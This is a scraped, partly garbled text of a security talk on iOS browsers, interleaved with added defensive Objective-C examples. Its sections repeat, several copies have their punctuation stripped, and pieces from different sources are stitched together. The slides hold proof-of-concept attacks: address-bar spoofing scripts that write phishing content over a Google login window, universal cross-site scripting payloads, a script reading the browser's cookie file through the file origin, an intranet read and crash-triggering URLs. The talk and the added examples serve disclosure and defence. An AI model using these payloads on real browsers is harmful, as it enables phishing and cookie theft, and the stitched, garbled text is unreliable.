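static NSURL *ParsedURLOrNil(NSString *urlString) {
    if (urlString.length == 0) return nil;
    NSURL *url = [NSURL URLWithString:urlString];
    if (url == nil || url.scheme.length == 0) return nil;
    return url;
}

// CFURL wrapper for the call on the slide. CFURLCreateWithString returns NULL for
// strings CoreFoundation cannot parse; passing that NULL to CFURLCopyPath is the
// crash shown. Returns a +1 CFStringRef (caller releases) or NULL.
static CFStringRef CopyPathIfValid(CFStringRef urlString) {
    if (urlString == NULL) return NULL;
    CFURLRef url = CFURLCreateWithString(kCFAllocatorDefault, urlString, NULL);
    if (url == NULL) return NULL;            // unparsable: no further CFURL calls on it
    CFStringRef path = CFURLCopyPath(url);   // may be NULL itself (no path component)
    CFRelease(url);
    return path;
}

typedef NS_ENUM(NSInteger, NavigationDecision) {
    NavigationDecisionLoad,     // parsed, http(s): hand to the web view
    NavigationDecisionReject,   // unparsable or non-web scheme: show an error page
};

// Gate for URLs arriving through a bridge or custom URI scheme. A rejected input is
// surfaced as an error, not silently loaded with a nil base.
static NavigationDecision DecideNavigation(NSString *candidate, NSURL **outURL) {
    NSURL *url = ParsedURLOrNil(candidate);
    if (outURL) *outURL = url;
    if (url == nil) return NavigationDecisionReject;
    NSString *scheme = url.scheme.lowercaseString;
    BOOL web = [scheme isEqualToString:@"http"] || [scheme isEqualToString:@"https"];
    return web ? NavigationDecisionLoad : NavigationDecisionReject;
}

int main(void) {
    @autoreleasepool {
        // Constructed inputs: one ordinary URL plus the percent-encoding cases from
        // the slide. Which of the malformed ones each parser rejects depends on the
        // OS version; the point is that a rejection never reaches a sink.
        NSArray *inputs = @[@"https://example.com/path", @"http://%", @"http://%5", @"http://%5c"];
        for (NSString *s in inputs) {
            NSURL *url = nil;
            NavigationDecision d = DecideNavigation(s, &url);
            CFStringRef path = CopyPathIfValid((__bridge CFStringRef)s);
            NSLog(@"%@ -> %@; CFURL path: %@", s,
                  d == NavigationDecisionLoad ? @"load" : @"reject",
                  path ? (__bridge NSString *)path : @"(rejected, no CFURL call made)");
            if (path) CFRelease(path);
        }
    }
    return 0;
}
```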
Opera Coast:
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()

• Special guest star: Safari on OS X Mavericks before Security Update 2014-02 (CVE-2014-1315)
<iframe src="lets-try-format-string:%p%p%p%p…">
SSL & password managers

SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept self-signed cert)
• 14 of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for main domain only (e.g. Opera Coast < 3.02)
Password managers
• JavaScript with privileges of top frame —> passwords not filled for subframes
• Usually possible to force saving password for another domain (with/without user interaction)
• Password filling checks for domain, but not always for URL scheme (https vs http)
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd party iOS browsers are experimental or side projects, built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
Questions?
lukasz.pilorz@runic.pl, pawel.wylecial@gmail.com
Twitter: @runicpl, @h0wlu
Thank you
![Page 19: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/19.jpg)
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 20: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/20.jpg)
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
JS without Same-Origin Policy
<script>
a = document.location.href.split('/');
if (a[0] === 'file:') {
  path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
  path = path + '/Library/Cookies/Cookies.binarycookies';
  x = new XMLHttpRequest(); x.open('GET', path, false); x.send();
  alert(x.responseText);
}
</script>
<script>
x = new XMLHttpRequest(); x.open('GET', 'https://your.intranet/', false); x.send();
alert(x.responseText);
</script>

Challenge: Hijack password autofill

Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header / HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView configuration.preferences.javaScriptEnabled = false
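The "Opening local HTML files safely" list as an added example that is not the presentation's code: a downloaded HTML file is shown either as its escaped source (the text/plain option) or rendered with JavaScript switched off, and in both cases with the explicit about:blank base URL, so the document never gets the file:// or applewebdata:// origin that the cookie-reading script above depends on. LocalFileMode, EscapeHTML and WebViewForLocalHTMLFile are names chosen here.

```objective-c
#import <UIKit/UIKit.h>
#import <WebKit/WebKit.h>

// Added example: display a local HTML file without a privileged origin.
typedef NS_ENUM(NSInteger, LocalFileMode) {
    LocalFileModeSource,     // show the markup as text, nothing is parsed as HTML
    LocalFileModeNoScript    // render the markup, but with JavaScript disabled
};

// Minimal HTML escaping for the source view.
static NSString *EscapeHTML(NSString *text) {
    NSString *s = [text stringByReplacingOccurrencesOfString:@"&" withString:@"&amp;"];
    s = [s stringByReplacingOccurrencesOfString:@"<" withString:@"&lt;"];
    return [s stringByReplacingOccurrencesOfString:@">" withString:@"&gt;"];
}

// Returns a WKWebView showing the file at `path`, or nil if it cannot be read.
// Two invariants: the base URL is the explicit about:blank URL (never nil and
// never the file's own file:// URL), and JavaScript is off for this view.
static WKWebView *WebViewForLocalHTMLFile(NSString *path, LocalFileMode mode, CGRect frame) {
    NSString *source = [NSString stringWithContentsOfFile:path
                                                 encoding:NSUTF8StringEncoding
                                                    error:NULL];
    if (source == nil) return nil;

    WKWebViewConfiguration *config = [WKWebViewConfiguration new];
    config.preferences.javaScriptEnabled = NO;      // the iOS 8 setting from the slide
    WKWebView *webView = [[WKWebView alloc] initWithFrame:frame configuration:config];

    NSString *page = source;
    if (mode == LocalFileModeSource) {
        // Equivalent of serving the file as text/plain: escape it and wrap it in <pre>.
        page = [NSString stringWithFormat:
                @"<!DOCTYPE html><meta charset=\"utf-8\"><pre>%@</pre>", EscapeHTML(source)];
    }
    // Never [webView loadRequest:[NSURLRequest requestWithURL:[NSURL fileURLWithPath:path]]]
    // for a download: that is the "opened directly from file://" case.
    [webView loadHTMLString:page baseURL:[NSURL URLWithString:@"about:blank"]];
    return webView;
}
```

The Content-Security-Policy option from the slide applies when the browser serves downloads through a local HTTP listener rather than loading them directly: the `sandbox` directive is only honoured as a response header, not in a `<meta>` element, so it cannot be injected into a string loaded with loadHTMLString:.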
In this presentation
• iOS Browsers: UIWebView, WKWebView
• Address Bar Spoofing
• Universal Cross-Site Scripting
• Popups & URL handling
• SSL & password managers

Popups & URL handling

Popup blockers
• Browsers rewriting href attributes for target=_blank can usually be tricked into believing the navigation was initiated by the user
• <iframe src="googlechrome://example.com">, <iframe src="merc://example.com"> etc. bypass all popup blockers anyway…
[diagram: Application (bolted-on) popup blocker vs Native (WebKit) popup blocker]

URI schemes
[diagram: Bridge (internal) schemes vs Registered (external) schemes]
• scheme://download/https://secure.tld/victim/data, scheme://download/http://attacker.tld/README.html
• scheme://add-filter?url=

CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a Null Pointer Dereference
• Tested with percent encoding: http://%, http://%5, http://%5c etc.
• Example, Opera Coast: <script>document.location = 'http://%5c'</script>
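One delegate that covers the three kinds of scheme on the slides above (schemes the tab renders, the browser's own bridge scheme, and schemes registered by other apps) together with the NULL check that the CFURL crash calls for, as an added example; it is not code from the presentation or from any browser it names. The bridge scheme name "app-bridge" and the names NavigationPolicy and PathOfURLString are assumptions made here.

```objective-c
#import <UIKit/UIKit.h>

// Added example: scheme policy in a UIWebViewDelegate.
static NSString *const kBridgeScheme = @"app-bridge";   // hypothetical internal scheme

// Direct CFURL use checks the creation result first: CFURLCreateWithString()
// returns NULL for input it cannot parse (the http://%5c test case above), and
// CFURLCopyPath(NULL) is the EXC_BAD_ACCESS in the Opera Coast backtrace.
static NSString *PathOfURLString(NSString *urlString) {
    CFURLRef cfURL = CFURLCreateWithString(kCFAllocatorDefault,
                                           (__bridge CFStringRef)urlString, NULL);
    if (cfURL == NULL) return nil;
    CFStringRef path = CFURLCopyPath(cfURL);
    CFRelease(cfURL);
    return path ? CFBridgingRelease(path) : nil;
}

@interface NavigationPolicy : NSObject <UIWebViewDelegate>
@property (nonatomic, copy) NSSet<NSString *> *webSchemes;       // rendered inside the tab
@property (nonatomic, copy) NSSet<NSString *> *externalSchemes;  // may leave the app
@end

@implementation NavigationPolicy
- (instancetype)init {
    if ((self = [super init])) {
        _webSchemes = [NSSet setWithArray:@[@"http", @"https", @"about", @"data"]];
        // Deliberately short: third-party app schemes such as googlechrome:// or
        // merc:// are not on it, so an <iframe src> cannot launch other apps.
        _externalSchemes = [NSSet setWithArray:@[@"tel", @"mailto"]];
    }
    return self;
}

// Bridge commands run on behalf of `document`, the page the tab really shows;
// the page never names its own identity inside the bridge URL.
- (void)handleBridgeCommand:(NSString *)command fromDocument:(NSURL *)document {
    NSLog(@"bridge command %@ from %@", command, document.absoluteString);
}

- (BOOL)webView:(UIWebView *)webView shouldStartLoadWithRequest:(NSURLRequest *)request
 navigationType:(UIWebViewNavigationType)navigationType {
    NSURL *url = request.URL;
    if (url == nil || url.scheme.length == 0) return NO;     // unparseable: drop it
    NSString *scheme = url.scheme.lowercaseString;

    if ([self.webSchemes containsObject:scheme]) return YES;

    if ([scheme isEqualToString:kBridgeScheme]) {
        // Only a top-level navigation reaches the bridge. For a request fired
        // from <iframe src="app-bridge://..."> the main document URL differs.
        BOOL topLevel = [url isEqual:request.mainDocumentURL];
        NSString *command = PathOfURLString(url.absoluteString);
        if (topLevel && command.length > 0) {
            [self handleBridgeCommand:command fromDocument:webView.request.mainDocumentURL];
        }
        return NO;                                            // never rendered
    }

    // Registered external schemes: a user click may open another app; iframe
    // loads and scripted navigations arrive as UIWebViewNavigationTypeOther and
    // are dropped. This is the popup decision made by the delegate, instead of
    // by rewriting href attributes in the page.
    BOOL userClick = (navigationType == UIWebViewNavigationTypeLinkClicked);
    if ([self.externalSchemes containsObject:scheme] && userClick &&
        [[UIApplication sharedApplication] canOpenURL:url]) {
        [[UIApplication sharedApplication] openURL:url];
    }
    return NO;   // unknown schemes are neither rendered nor handed to the OS
}
@end
```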
Opera Coast:
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()

• Special guest star: Safari on OS X Mavericks before Security Update 2014-02 (CVE-2014-1315)
<iframe src="lets-try-format-string:%p%p%p%p…">
SSL & password managers

SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 14% of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.02)
